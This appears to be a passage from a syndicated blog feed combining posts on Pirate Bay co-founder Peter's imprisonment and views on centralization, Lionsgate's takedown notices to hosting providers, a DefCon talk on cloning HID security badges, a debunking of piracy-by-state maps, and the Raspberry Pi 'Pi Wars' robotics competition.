In Peter’s eyes, the Pirate Bay has run its course and turned into a commercial enterprise that has little to do with the values it was founded on. Nowadays, the most important battles for an open Internet take place elsewhere, he says, noting that the trend towards centralization is not limited to file sharing.

Facebook alone has turned into its own little walled-garden version of the Internet that a lot of users would be content using without access to the wider Net. At the same time, services from Google to Wikipedia are working on distribution deals that make their services available to people without real Internet access.

One step to counter this trend towards centralization could be data portability, the right to take all one’s personal data from a service such as Facebook and bring it along to a competitor. The right to data portability is part of the proposed European data protection regulation that is currently stuck in negotiations among the EU member states.

“Having data portability would be a great step forward, but it’s not enough. Portability is meaningless without competition.” Peter says.

“As activists and entrepreneurs, we need to challenge monopolies. We need to build a Pirate social network that is interoperable with Facebook. Or build competition to small monopolies before they get bought up by the big players in the field. Political activism in parliaments, as the Pirate Party pursues it, is important, but needs to be combined with economic disruptions.

“The Internet won’t change fundamentally in the next two years, but in the long-term, the effects of the decisions we take today can be dramatic.”

According to Peter, establishing net neutrality, especially on mobile networks, will be one of the crucial fights. The Internet may have started out as a non-commercial space, but is entirely ruled by business arguments nowadays, and without net neutrality, large corporations will be able to strengthen their monopolies and stifle innovation. A pushback will be needed from small enterprises as well as civil society – but those groups struggle to be heard in political debates as they often lack the financial resources for large-scale lobbying efforts.

Although Peter is visibly affected by his imprisonment and talks about struggling with depression, he has not stopped making plans for the future. “Things will get easier once I get out. I’ve been a fugitive for two years and could hardly go to conferences or would have to show up unannounced.”

Once his eight month sentence has come to an end, Peter wants to get back to activism. When I ask about his upcoming projects, he starts grinning and tells me to be patient.

“All I can say now is that I’m brimming with ideas and that one of my main goals will be to develop ethical ways of funding activism. You often need money to change things. But most ways of acquiring it require you to compromise on your ideals. We can do better than that.”

Peter is now hoping for his prison sentence to eventually be transformed into house arrest, which would allow him to see his critically ill father and spend less time in isolation. Whether that happens will largely depend on whether the Swedish state will continue to view a file-sharing activist as a serious threat to the public. In a society where the majority of young people routinely break copyright law simply by sharing culture, that view seems entirely unsustainable.

About The Author

Julia Reda is a German politician for the Pirate Party Germany and a member of the European Parliament since 2014, where she serves as a Vice-President of the Greens/EFA group. She is also the chairperson of the Young Pirates of Europe.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Lionsgate Targets Hosting Providers & Domain Registrars Over Expendables 3 Piracy

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

expendablesToday sees the official premiere of The Expendables 3, but what was supposed to be a celebration for the makers has turned into a fiasco.

Three weeks ago a high quality leak of the film appeared online. This resulted in millions of downloads long before it reached the big screen.

Fearing a massive loss in revenue, Lionsgate issued thousands of takedown requests to limit the leak’s availability and sued six file-sharing sites that allegedly failed to respond to these notices.

It now appears that Lionsgate has more tricks up its sleeve. The owner of cloud hosting service filecloud.io informs TorrentFreak that he never heard from Lionsgate, yet the movie studio is now going after his DDoS protection provider Cloudflare and domain registrar Easyname.

TorrentFreak obtained a copy of the notice, which is also believed to have been sent to the service providers of several other file-sharing sites. In the notice Lionsgate’s law firm Kilpatrick Townsend & Stockton requests that these companies render the sites in question unavailable.

The law firm lists several allegedly infringing URLs and points out that the hosting providers and domain name registrars have to take responsibility.

part of Lionsgate’s notice
notice-lions-small

The following text comes from a notice Cloudflare and others received, accusing the company of potentially assisting a criminal operation and ignoring a previous notice.

“In accordance with the DMCA, we have already notified you of the infringement, but you have continued to cause, enable, induce, facilitate and materially contribute to the infringement by continuing to provide your users with the means to unlawfully distribute, reproduce and otherwise exploit The Expendables 3,” the email reads.

The same takedown notice was also sent to the domain name registrar Easyname, who were encouraged to “take action” against the allegedly infringing site under ICANN rules. In their notice Lionsgate appears to hint at a domain name suspension.

“If you are the domain name registrar for the domain name referenced above, under ICANN rule 3.18.1, you are required to take reasonable and prompt steps to investigate and respond appropriately to any reports of abuse,” the notice reads.

“You are hereby put on notice that despite Rule 3.18, and the website owner’s representation to you that it is not using the domain name ‘in violation of any applicable laws’, the owner is either directly infringing the rights of Lionsgate or contributing to such infringement through the distribution of the stolen work referenced above,” it adds.

Lionsgate’s methods are unusual as the operator of filecloud.io was never contacted by the movie studio’s law firm. There were abuse mails sent by other outfits though, and the URLs listed in the takedown notice were already taken offline. This means that the infringing pages listed by Lionsgate were directed to a 404 page.

The owner of filecloud.io informs TF that he’s not happy with the pressure Lionsgate has put on the companies he works with, especially since they failed to first contact the site itself.

“It might be nice if these complaining entities actually checked that their emails have a valid claim before firing them off to everyone under the moon,” filecloud.io’s owner notes.

“The majority of notices I get daily are dud but at least none of them go out of their way forwarding their gripe to everyone who has anything remotely to do with the site,” he adds.

In this case the notices haven’t yet caused any trouble for filecloud.io, but it’s not hard to imagine a scenario in which smaller companies are easily threatened to pull the plug on an accused site.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Krebs on Security: How Secure is Your Security Badge?

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Security conferences are a great place to learn about the latest hacking tricks, tools and exploits, but they also remind us of important stuff that was shown to be hackable in previous years yet never really got fixed. Perhaps the best example of this at last week’s annual DefCon security conference in Las Vegas came from hackers who built on research first released in 2010 to show just how trivial it still is to read, modify and clone most HID cards — the rectangular white plastic “smart” cards that organizations worldwide distribute to employees for security badges.

HID iClass proximity card.

HID iClass proximity card.

Nearly four years ago, researchers at the Chaos Communication Congress (CCC), a security conference in Berlin, released a paper (PDF) demonstrating a serious vulnerability in smart cards made by Austin, Texas-based HID Global, by far the largest manufacturer of these devices. The CCC researchers showed that the card reader device that HID sells to validate the data stored on its then-new line of iClass proximity cards includes the master encryption key needed to read data on those cards.

More importantly, the researchers proved that anyone with physical access to one of these readers could extract the encryption key and use it to read, clone, and modify data stored on any HID cards made to work with those readers.

At the time, HID responded by modifying future models of card readers so that the firmware stored inside them could not be so easily dumped or read (i.e., the company removed the external serial interface on new readers). But according to researchers, HID never changed the master encryption key for its readers, likely because doing so would require customers using the product to modify or replace all of their readers and cards — a costly proposition by any measure given HID’s huge market share.

Unfortunately, this means that anyone with a modicum of hardware hacking skills, an eBay account, and a budget of less than $500 can grab a copy of the master encryption key and create a portable system for reading and cloning HID cards. At least, that was the gist of the DefCon talk given last week by the co-founders of Lares Consulting, a company that gets hired to test clients’ physical and network security.

Lares’ Joshua Perrymon and Eric Smith demonstrated how an HID parking garage reader capable of reading cards up to three feet away was purchased off of eBay and modified to fit inside of a common backpack. Wearing this backpack, an attacker looking to gain access to a building protected by HID’s iClass cards could obtain that access simply by walking up to a employee of the targeted organization and asking for directions, a light of a cigarette, or some other pretext.

Card cloning gear fits in a briefcase. Image: Lares Consulting.

Card cloning gear fits in a briefcase. Image: Lares Consulting.

Perrymon and Smith noted that, thanks to software tools available online, it’s easy to take card data gathered by the mobile reader and encode it onto a new card (also broadly available on eBay for a few pennies apiece). Worse yet, the attacker is then also able to gain access to areas of the targeted facility that are off-limits to the legitimate owner of the card that was cloned, because the ones and zeros stored on the card that specify that access level also can be modified.

Smith said he and Perrymon wanted to revive the issue at DefCon to raise awareness about a widespread vulnerability in physical security.  HID did not respond to multiple requests for comment.

“Until recently, no one has really demonstrated properly what the risk is to a business here,” Smith said. “SCADA installations, hospitals, airports…a lot of them use HID cards because HID is the leader in this space, but they’re using compromised technology. Your card might not have data center or HR access but I can get into those places within your organization just by coming up to some employee standing outside the building and bumming a light off of him.”

Organizations that are vulnerable have several options. Probably the cheapest involves the use of some type of sleeve for the smart cards. The wireless communications technology that these cards use to transmit data — called radio-frequency identification or RFID – can be blocked when not in use by storing the key cards inside a special RFID-shielding sleeve or wallet. Of course, organizations can replace their readers with newer (perhaps non-HID?) technology, and/or add biometric components to card readers, but these options could get pricey in a hurry.

A copy of the slides from Perrymon and Smith’s DefCon talk is available here.

TorrentFreak: Most-Pirated Movies, TV-Shows and Games Per State… Debunked

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

crosscatPiracy is a hot topic, so when there are statistics to report the media is usually all over it. This week a series of intriguing maps has been doing the rounds.

The data was first published by the piracy experts over at Movoto Real Estate. Based on a large sample of three million unique IP addresses collected over a period of 40 days they presented a map of the most torrented movies, TV-shows and games per state.

This was quickly picked up by The Washington Post, Venturebeat and several other publications, who all shared the findings with their readers. TorrentFreak was ready to jump on the bandwagon too, but we couldn’t help noticing a few odd results.

What stands out immediately is that some of the most-downloaded movies in certain states are barely downloaded at all through torrent sites. “La Grande Bellezza” in New Jersey, for example, or “Cuban Fury” in Florida. The same is true for “Witching and Bitching” which, according to the map, is very popular in Indiana and Tennessee.

Are these movies really more often downloaded than blockbuster successes such as Divergent and X-Men as the map below suggests?

Most pirated movies per state?
most-downloaded-movie

The same odd results appear in the games and TV-show maps. Game of Thrones is by far the most downloaded TV-show in America, but for some reason “Awkward” is more popular in Texas and Louisiana. The same Louisianans also download the game “Scribblenauts Unlimited” more frequently than popular releases such as Minecraft and Watch Dogs.

Something is clearly amiss, so we took the unprecedented step of downloading the source data which is readily available.

To our surprise, the maps in question don’t represent the most-downloaded titles. Instead, they appear to reveal for which shows the download numbers differ the most when compared to the national average. This is completely unrelated to which movie, TV-show or game was downloaded the most.

Whoops, not downloads
variation

Now back to our earlier question. Is “La Grande Bellezza” really that popular in New Jersey? No, the actual data shows only 2 downloads in this state…

Similarly, is “Awkward” the most pirated TV-show in Texas? Again, no, it has 232 downloads in the dataset compared to 2,554 for a single Game of Thrones episode. And we can go on and on.

In fact, if we made a real map based on the actual download counts in the dataset, Game of Thrones would be the most downloaded show in each and every state, as expected.

Confusingly, however, a map of the most pirated movies per state would list “Blood Widow” on top in pretty much every state.

This suggests that there’s an issue with the data itself too, as this movie is nowhere to be found in the list of most shared files on The Pirate Bay and elsewhere. The most likely explanation is that the researchers ran into a fake torrent file with bogus IP-addresses.

Whatever the case, it’s safe to say that the maps in question should be taken with a grain of salt, or a barrel of rum perhaps.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Raspberry Pi: Pi Wars

This post was syndicated from: Raspberry Pi and was written by: Helen Lynn. Original post: at Raspberry Pi

Helen: This December will see a Cambridge Raspberry Jam with a difference; we’re giving you all plenty of notice, so that you have time to prepare. We’ll let organisers Michael Horne and Tim Richardson tell you all about it.

Pi Wars

On 6th December this year, the Cambridge Raspberry Jam (CamJam) will play host to the first ever dedicated Raspberry Pi robotics competition: Pi Wars. Named after the BBC series Robot Wars, this competition is challenge-based and is similar to a ‘robot olympics’. Robots will take part in challenges to score points and, as we all know, points mean prizes! Our aim isn’t to have robots destroy each other – we want people to compete to show what they’ve managed to get their robots to do!

We’ve put together some overall rules for the competition which you can read here.

The robot challenges are as follows:

  • Line Follower
  • Obstacle Course
  • Proximity Alert
  • Robot Golf
  • Straight Line Speed Test
  • Sumo Battle
  • Three Point Turn
  • Aesthetics
  • Code Quality

You can read a full description of each challenge by visiting this page.

We’ve also got some side-competitions into which competing robots are automatically entered:

  • Smallest robot
  • Best non-competing robot
  • Best autonomous robot
  • Most feature-rich robot
  • The Jim Darby Prize for Excessive Blinkiness
  • Most innovative robot
  • Most visually appealing robot

We’re also hoping to have some non-competing robots in our Show-and-Tell area.

A robot

We are expecting (okay, hoping!) to have 16 robot competitors. This will give us a nice sized competition without having so many that we’re there until midnight :-) We’re even hoping that it will be an international competition – we’ve already had interest from a team in Egypt! Obviously, we’ll also have tickets available for spectators, of which we’re expecting between 100 and 150.

We are looking for sponsors to supply prizes for the competition and you can get more information on that by visiting this page.

Registration for the competition opens on 15th September and registration for spectator tickets will open sometime in late October/early November. We’re hoping that it will be an extremely popular event… Who knows? This could be the start of an annual event!

If you’d like to read more about Pi Wars, visit www.piwars.org.